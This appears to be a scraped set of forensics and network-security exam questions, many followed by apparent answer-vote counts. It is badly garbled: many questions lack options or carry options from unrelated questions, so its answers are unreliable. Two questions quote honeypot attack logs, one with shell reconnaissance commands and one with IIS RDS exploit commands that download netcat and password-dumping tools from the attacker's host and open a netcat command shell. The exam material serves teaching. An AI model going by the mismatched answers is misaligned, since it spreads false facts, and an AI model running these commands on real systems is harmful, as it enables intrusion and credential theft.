FCNS Questions
It has been discovered that a former member of the IT department who switched to the development
team still has administrative access to many major network infrastructure devices and servers. Which
of the following mitigation techniques should be implemented to help reduce the risk of this event
recurring?
77 A. DLP
414 B. Incident management and response policy
437 C. Change management notifications
377 D. Regular user permission and rights reviews
2.
In a computer forensics investigation, what describes the route that evidence takes from the time you
find it until the case is closed or goes to court?
A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker. Given below is an
excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by
studying the log. Please note that you are required to infer only what is explicit in the excerpt. (Note:
The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP
connection concepts and the ability to read packet signatures from a sniff dump.)

03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111
TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23678634 2878772
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111
UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84
Len: 64
01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0  ................
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01  ................
00 00 00 11 00 00 00 00                          ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773
UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104
Len: 1084
47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8  G..c............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20  ...............
3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C 68 6F 73  :.^.....localhost
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

03/15-20:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168
TCP TTL:43 TOS:0x0 ID:31660 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23679878 2880015
63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20  cd /; uname -a;
69 64 3B                                         id;
What file structure database would you expect to find on floppy disks?
114 A. NTFS
132 B. FAT 32
81 C. FAT 16
975 D. FAT 12
5.
When examining a file with a Hex Editor, what space does the file header occupy?
306 A. number of circles x number of halves x number of sides x 512 bytes per sector
407 B. The answer is wrong
127 C. number of cells x number of heads x number of sides x 512 bytes per sector
463 D. number of cylinders x number of halves x number of shims x 512 bytes per sector
7.
A suspect is accused of violating the acceptable use of computing resources, as he has visited adult
websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed
visit these sites. However, the suspect has cleared the search history and emptied the cookie cache.
Moreover, he has removed any images he might have downloaded. What can the investigator do to
prove the violation? Choose the most feasible option.
Which part of the Windows Registry contains the user's password file?
773 A. HKEY_LOCAL_MACHINE
70 B. HKEY_CURRENT_CONFIGURATION
237 C. HKEY_USER
222 D. HKEY_CURRENT_USER
9.
Which of the following is a benefit of removing unused or unneeded services and protocols?
The component of a DDoS attack that sends commands to DDoS zombie agents is known as a
_____.
Which of the following is a weakness in WEP related to the IV? (Select all that apply)
246 A. The IV is a static value, which makes it relatively easy for an attacker to brute force the
WEP key from captured traffic
549 B. The IV is transmitted in plaintext and can be easily seen in captured traffic
426 C. The IV is only 24 bits in size, which makes it possible that two or more data frames will
be transmitted with the same IV, thereby resulting in an IV collision that an attacker can use to
determine information about the network
80 D. There is no weakness in WEP related to the IV
12.
You are creating a DMZ for a company and need to allow external users to access Web servers in the
DMZ using HTTP/S, as well as allow internal users to access the same Web servers. Which ports
should be opened on the firewalls to meet these requirements?
175 A. Open port 80 on the external firewall and port 443 on the internal firewall
811 B. Open port 443 on the external firewall and port 80 on the internal firewall
120 C. Open port 80 on the external firewall and port 110 on the internal firewall
198 D. Open port 110 on the external firewall and port 80 on the internal firewall
13.
When you use Java, the JVM isolates the Java applet to a sandbox when it executes. What does this
do to provide additional security?
98 A. This prevents the Java applet from accessing data on the client's hard drive
286 B. This prevents the Java applet from communicating with servers other than the one from
which it was downloaded
119 C. This prevents the Java applet from failing in such a way that the Java applet is
unable to execute
799 D. This prevents the Java applet from failing in such a way that it affects another
application
14.
You are setting up a test plan for verifying that new code being placed on a Web server is secure and
does not cause any problems with the production Web server. What is the best way to test the code
prior to deploying it to the production Web server?
141 A. Test all new code on a development PC prior to transferring it to the production Web
server
297 B. Test all new code on an active internal Web server prior to transferring it to the
production web server
600 C. Test all new code on a duplicate web server prior to transferring it to the production
web server
266 D. Test all new code on another user's PC prior to transferring it to the production web
server
15.
To allow its employees remote access to the corporate network, a company has implemented a
hardware VPN solution. Why is this considered a secure remote access solution?
221 A. Because only the company's employees will know the address to connect to in order
to use the VPN
101 B. Because VPNs use the internet to transfer data
111 C. Because a VPN uses compression to make its data secure
870 D. Because a VPN uses encryption to make its data secure
16.
The network team at your company has placed a sniffer on the network to analyze an ongoing
network-related problem. The team connects to the sniffer using Telnet to view the data going
across the network. What would you recommend to increase the security of this connection without
making it significantly more difficult for the network team members to do their jobs?
643 A. TCP/IP
108 B. DNS
529 C. MPPE
21 D. AppleTalk
18.
Sally has come to you for advice and guidance. She is trying to configure a network device to block
attempts to connect on certain ports, but when she finishes the configuration, it works for a period of
time but then changes back to the original configuration. She cannot understand why the settings
continue to change back. When you examine the configuration, you find that the _______ are
incorrect, and are allowing Bob to change the configuration, although he is not supposed to operate
or configure this device. Since he did not know about Sally, he kept changing the configuration back.
Josh has asked for a clarification of what a firmware update is. How could you briefly describe for him
the purpose of firmware updates? (Pick the best answer)
1087 A. Firmware updates are control software- or BIOS-type updates that are installed to
improve the functionality or extend the life of the device involved
116 B. Firmware updates are device-specific command sets that must be upgraded to continue
operation
56 C. Firmware updates update the mechanical function of the device
40 D. Firmware updates are minor fixes, and are not usually necessary
20.
When an investigator contacts by telephone the domain administrator or controller listed by a whois
lookup to request all e-mails sent and received for a user account be preserved, what U.S.C. statute
authorizes this phone call and obligates the ISP to preserve e-mail records?
Before you are called to testify as an expert, what must an attorney do first?
An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital
video discs (DVDs) by using a large magnet. You inform him that this method will not be effective in
wiping out the data because CDs and DVDs are______________ media used to store large amounts
of data and are not affected by the magnet.
51 A. logical
90 B. anti-magnetic
87 C. magnetic
1075 D. optical
25.
Lance wants to place a honeypot on his network. Which of the following would be your
recommendations?
89 A. All forms should be placed in an approved secure container because they are now
primary evidence in the case.
902 B. The multi-evidence form should be placed in the report file and the single-evidence
forms should be kept with each hard drive in an approved secure container.
228 C. The multi-evidence form should be placed in an approved secure container with the
hard drives and the single-evidence forms should be placed in the report file.
82 D. All forms should be placed in the report file because they are now primary evidence in
the case.
28.
An e-mail log does not contain which of the following information to help you in your investigation?
(Select up to 4)
In what way do the procedures for dealing with evidence in a criminal case differ from the procedures
for dealing with evidence in a civil case?
83 A. evidence must be handled in the same way regardless of the type of case
72 B. evidence procedures are not important unless you work for a law enforcement agency
1019 C. evidence in a criminal case must be secured more tightly than in a civil case
127 D. evidence in a civil case must be secured more tightly than in a criminal case
31.
You are assigned to work in the computer forensics lab of a state police agency. While working on a
high-profile criminal case, you have followed every applicable procedure; however, your boss is still
concerned that the defense attorney might question whether evidence has been changed while at the
lab. What can you do to prove that the evidence is the same as it was when it first entered the lab?
1162 A. make an MD5 hash of the evidence and compare it with the original MD5 hash that
was taken when the evidence first entered the lab
69 B. make an MD5 hash of the evidence and compare it to the standard database
developed by NIST
17 C. there is no reason to worry about this possible claim because state labs are certified
54 D. sign a statement attesting that the evidence is the same as it was when it entered the
lab
32.
When monitoring for both intrusion and security events between multiple computers, it is essential
that the computers' clocks are synchronized. Synchronized time allows an administrator to
reconstruct what took place during an attack against multiple computers. Without synchronized time,
it is very difficult to determine exactly when specific events took place, and how events interlace.
What is the name of the service used to synchronize time among multiple computers?
When investigating a potential e-mail crime, what is your first step in the investigation?
What happens when a file is deleted by a Microsoft operating system using the FAT file system?
1094 A. only the reference to the file is removed from the FAT
73 B. the file is erased and cannot be recovered
44 C. a copy of the file is stored and the original file is erased
90 D. the file is erased but can be recovered
35.
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported
Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability
(UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to
run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He
then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to
construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server.
He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is
functioning correctly. The attacker makes an RDS query which results in the commands run as shown
below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
What term is used to describe a cryptographic technique for embedding information into something
else for the sole purpose of hiding that information from the casual observer?
45 A. rootkit
198 B. key escrow
1030 C. steganography
31 D. Offset
37.
During the course of an investigation, you locate evidence that may prove the innocence of the
suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire
fact finding process. Therefore you report this evidence. This type of evidence is known as:
99 A. Inculpatory evidence
187 B. mandatory evidence
953 C. exculpatory evidence
63 D. Terrible evidence
38.
Corporate investigations are typically easier than public investigations because ...
866 A. MIME
114 B. UuenCode
152 C. IMAP
173 D. SMTP
40.
If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you do
not contaminate or alter data on the suspect's hard drive by booting to the hard drive.
42 A. deltree command
679 B. CMOS
459 C. Boot sys
124 D. Scandisk utility
41.
684 A. particularly describe the place to be searched and particularly describe the items to be
seized
246 B. generally describe the place to be searched and particularly describe the items to be
seized
163 C. generally describe the place to be searched and generally describe the items to be
seized
204 D. particularly describe the place to be searched and generally describe the items to be
seized
42.
If a suspect computer is located in an area that may have toxic chemicals, you must:
Which is the most important reason for the removal of unused, unnecessary, or unneeded protocols,
services, and applications?
The act of attempting to appear to be someone you’re not in order to gain access to a system is
known as which of the following?
1096 A. Spoofing
81 B. DDoS
36 C. Replay
89 D. Sniffing
45.
Which of the following is most likely to make systems vulnerable to MITM attacks?
Which of the following is the best way to protect your organization from revealing sensitive
information through dumpster diving?
The use of VPNs and _______ has enabled users to be able to telecommute.
807 A. PGP
36 B. S/MIME
185 C. Wireless NICs
273 D. RASs
48.
PDAs, cell phones, and certain network cards have the ability to use _______ networks. Choose the
BEST answer.
20 A. Wired
805 B. Private
465 C. Wireless
12 D. Antique
49.
There are three recognized levels of hacking ability in the internet community. The first is the skilled
hacker, who writes the programs and scripts that script kiddies use for their attacks. Next comes the
script kiddie, who knows how to run the scripts written by the skilled hackers. After the script kiddies
come the _______, who lack the basic knowledge of networks and security to launch an attack
themselves.
831 A. Web kiddies
79 B. Clickers
332 C. Click kiddies
58 D. Dunce kiddies
50.